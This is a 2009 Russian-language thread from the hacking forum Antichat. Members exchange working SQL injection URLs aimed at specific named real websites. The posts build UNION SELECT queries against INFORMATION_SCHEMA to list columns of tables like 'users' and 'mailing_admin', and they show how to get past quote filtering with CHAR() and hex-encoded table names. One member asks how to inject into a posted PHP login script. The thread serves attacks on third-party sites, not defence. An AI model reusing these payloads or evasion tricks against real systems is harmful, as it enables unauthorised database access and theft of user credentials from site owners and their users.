ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
18.03.2009, 18:19
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Порылся в исходном коде...вот:
PHP код:
session_set_cookie_params(3600);
session_start();
if(isset($_SESSION['username']) && strlen($_SESSION['username']) && isset($_SESSION['password']) && strlen($_SESSION['password']))
{
$s_username = $_SESSION['username'];
$s_password = $_SESSION['password'];
include("include/mysql_connect.php");
$result = mysql_query("SELECT user_id, level FROM Users WHERE username='$s_username' && password=Password('$s_password')");
while($row = mysql_fetch_array($result))
{
$userid = $row["user_id"];
$s_user_id = $row["user_id"];
$s_level = $row["level"];
}
$num = mysql_num_rows($result);
if($num == 0)
{
header("Location: error2.php");
exit();
}
elseif($num == 1)
{
$course_id = $_REQUEST['course_id'];
if(!is_numeric($course_id))
{
$course_id = 0;
}
if($s_level == 0)
{
$result1 = mysql_query("SELECT * FROM Courses_Users WHERE user_id='$s_user_id' && course_id='$course_id'");
$num_c = mysql_num_rows($result1);
}
if($s_level > 0)
{
$result1 = mysql_query("SELECT * FROM Courses WHERE teacher='$s_user_id' && course_id='$course_id'");
$num_c = mysql_num_rows($result1);
}
$num_c = mysql_num_rows($result1);
if($num_c == 0)
{
header("Location: error2.php");
exit();
}
}
else
{
header("Location: index.php");
exit();
}
}
else
{
header("Location: index.php");
exit();
}
?>
Реально ли здесь провести sql inj ? Проверок нету,разве что на существование.
И ещё вопросег: там проверка course_id идёт только на то.является ли значение числом...можно ли это обойти ?
Последний раз редактировалось Велемир; 18.03.2009 в 18:22..
|
|
|
18.03.2009, 18:23
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Офф имеется...А при mysql_quotes_gpc = On какой был бы вариант ?
ЗЫ: на этапе $s_username = $_SESSION['username']; можно вместо username подставить запрос?
Последний раз редактировалось Велемир; 18.03.2009 в 18:25..
|
|
|
|
18.03.2009, 18:24
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766
Репутация:
61
|
|
Почему возникает ошибка при таком запросе?
Что-то в синтаксисе не так?
PHP код:
http://www.moviead.com/display.cfm?id=-1+union+select+1,2,3,COLUMN_NAME,5,6,7,8,9,10,11,12+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='users'+LIMIT+1,1--
|
|
|
|
18.03.2009, 18:25
|
|
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874
Репутация:
1020
|
|
Сообщение от Велемир
Реально ли здесь провести sql inj ? Проверок нету,разве что на существование.
И ещё вопросег: там проверка course_id идёт только на то.является ли значение числом...можно ли это обойти ?
Сессия храниться на сервере со всеми данными а пользователь лишь передает ее индетификатор, так что думай
2Byrger без кавычек
Unknown column 'users' in 'where clause'
Последний раз редактировалось AkyHa_MaTaTa; 18.03.2009 в 18:30..
|
|
|
|
18.03.2009, 18:28
|
|
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973
Репутация:
466
|
|
2 Byrger
А ты кавычки ' замени на "
http://www.moviead.com/display.cfm?id=-1+union+select+1,2,3,COLUMN_NAME,5,6,7,8,9,10,11,1 2+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME =%22users%22+LIMIT+1,1--
типа так!
|
|
|
|
18.03.2009, 18:28
|
|
Новичок
Регистрация: 15.12.2008
Сообщений: 11
Провел на форуме:
36737
Репутация:
6
|
|
Мм, я недавно начал заниматься sql inj поэтому туплю маленько.
Вот например пытаюсь подобрать кол-во столбцов в db_galery
http://www.danieldefo.ru/gallery.html?top=1;-- UNION SELECT 1 --
Ошибки нет, возвращается так же страница =\
|
|
|
|
18.03.2009, 18:28
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489
Репутация:
1359
|
|
Сообщение от Byrger
Почему возникает ошибка при таком запросе?
Что-то в синтаксисе не так?
PHP код:
http://www.moviead.com/display.cfm?id=-1+union+select+1,2,3,COLUMN_NAME,5,6,7,8,9,10,11,12+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='users'+LIMIT+1,1--
http://www.moviead.com/display.cfm?id=-1+union+select+1,2,3,COLUMN_NAME,5,6,7,8,9,10,11,1 2+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME =CHAR(117,115,101,114,115)+LIMIT+1,1--
|
|
|
|
18.03.2009, 18:56
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766
Репутация:
61
|
|
http://supertractor.ru/index.php?rshow=price&act=viewcat&cid=-1+union+select+1,COLUMN_NAME,3,4+FROM+information_ schema.columns+WHERE+table_name=%22mailing_admin%2 2--
А тут почему не читает? (слепая скуля)
|
|
|
|
18.03.2009, 18:58
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
http://supertractor.ru/index.php?rshow=price&act=viewcat&cid=-1+union+select+1,COLUMN_NAME,3,4+FROM+information_ schema.columns+WHERE+table_name=0x6d61696c696e675f 61646d696e--
|
|
|
|
18.03.2009, 18:59
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766
Репутация:
61
|
|
Сообщение от Pashkela
http://supertractor.ru/index.php?rshow=price&act=viewcat&cid=-1+union+select+1,COLUMN_NAME,3,4+FROM+information_ schema.columns+WHERE+table_name=0x6d61696c696e675f 61646d696e--
А где переводить в такую бяку?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
